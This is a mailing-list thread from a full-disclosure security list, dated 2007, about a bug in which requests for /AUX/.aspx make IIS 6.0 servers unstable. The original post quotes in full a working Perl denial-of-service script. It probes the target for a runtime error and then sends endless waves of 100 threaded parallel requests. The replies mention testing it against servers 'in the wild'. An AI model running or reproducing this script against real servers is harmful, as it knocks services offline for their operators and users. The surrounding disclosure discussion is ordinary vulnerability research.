Question Regarding IIS 6.0 / Is this a DoS???

["Joey Mengele" <joey.mengele () hushmail com>]

MacOS 10.2.8 also appears to be invulnerable to this. When I 
attempt to exploit the bug on a default install, I get 'connection 
refused' error.

Joey

On Tue, 22 May 2007 11:22:51 -0400 kingcope <kingcope () gmx net> 
wrote:
> Hello Stan,
>
> This is a good question. When I tested this on the latest
> Windows Server 2007 with IIS/6.0 locally there was nothing
> Like a DoS. On different Windows Servers in the wild the effect 
> was
> That the servers did not respond for about 5 minutes after sending
> The packets for ~20 seconds in many cases (also 5.0). Running the 
> script for
> several minutes gave me an HTTPException on /. Perhaps this may be 
> a
> configuration issue?
>
>
> Best Regards,
>
> kcope
>
> -----Original Message-----
> From: Stan Bubrouski [mailto:stan.bubrouski () gmail com] 
> Sent: Tuesday, May 22, 2007 5:07 PM
> To: kingcope
> Cc: full-disclosure () lists grok org uk
> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is 
> this a DoS???
>
> What version of the .NET framework is running on the server? 
> 1.1.x,
> 2.0.x, or 3.0.x?
>
> -sb
>
> On 5/22/07, kingcope <kingcope () gmx net> wrote:
> > Hello List,
> >
> > Recently I saw a small bug in IIS 6.0 when requesting a special 
> path.
> > When I request /AUX/.aspx the server takes a bit longer to 
> respond as
> > Normally. So I did write an automated script to see what happens 
> if
> > I request this file several times at once. The result is that 
> some servers
> > On the internet get quite instable, some do not. On some servers 
> after I
> > Stop the attack I get an exception that the Server is too 
> busy/Unhandled
> > Exception on the wwwroot (/) path.
> > Can you/the list confirm that?
> >
> > Here is a lame testing script for this stuff:
> >
> >
> >
> >
> >
> > #When sending multiple parallel GET requests to a IIS 6.0 server
> requesting
> > #/AUX/.aspx the server gets instable and non responsive. This 
> happens only
> > #to servers which respond a runtime error 
> (System.Web.HttpException)
> > #and take two or more seconds to respond to the /AUX/.aspx GET 
> request.
> > #
> > #
> > #signed,
> > #Kingcope kingcope () gmx net
> ###################################################################
> #######
> >
> ###****************************************************************
> *******
> > ###
> > ###
> > ###
> > ### Lame Internet Information Server 6.0 Denial Of Service 
> (nonpermanent)
> > ### by Kingcope, May/2007
> > ### Better run this from a Linux system
> ###################################################################
> #######
> > use IO::Socket;
> > use threads;
> >
> > if ($ARGV[0] eq "") { exit; }
> > my $host = $ARGV[0];
> >
> > $|=1;
> >
> > sub sendit {
> > $sock = IO::Socket::INET->new(PeerAddr => $host,
> >                               PeerPort => 'http(80)',
> >                               Proto    => 'tcp');
> >
> > print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
> > $host\r\nConnection:close\r\n\r\n";
> > }
> >
> > $sock = IO::Socket::INET->new(PeerAddr => $host,
> >                               PeerPort => 'http(80)',
> >                               Proto    => 'tcp');
> >
> > print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
> > $host\r\nConnection:close\r\n\r\n";
> >
> > $k=0;
> > while (<$sock>) {
> >         if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) 
> {
> >                         $k=1;
> >                         last;
> >         }
> > }
> >
> > if ($k==0) {
> >         print "Server does not seem vulnerable to this 
> attack.\n";
> >         exit;
> > }
> >
> > print "ATTACK!\n";
> >
> > while(1){
> >
> > for (my $i=0;$i<=100;$i++) {
> >         $thr = threads->new(\&sendit);
> >         print "\r\r\r$i/100                        ";
> > }
> >
> > foreach $thr (threads->list) {
> >         $thr->join;
> > }
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/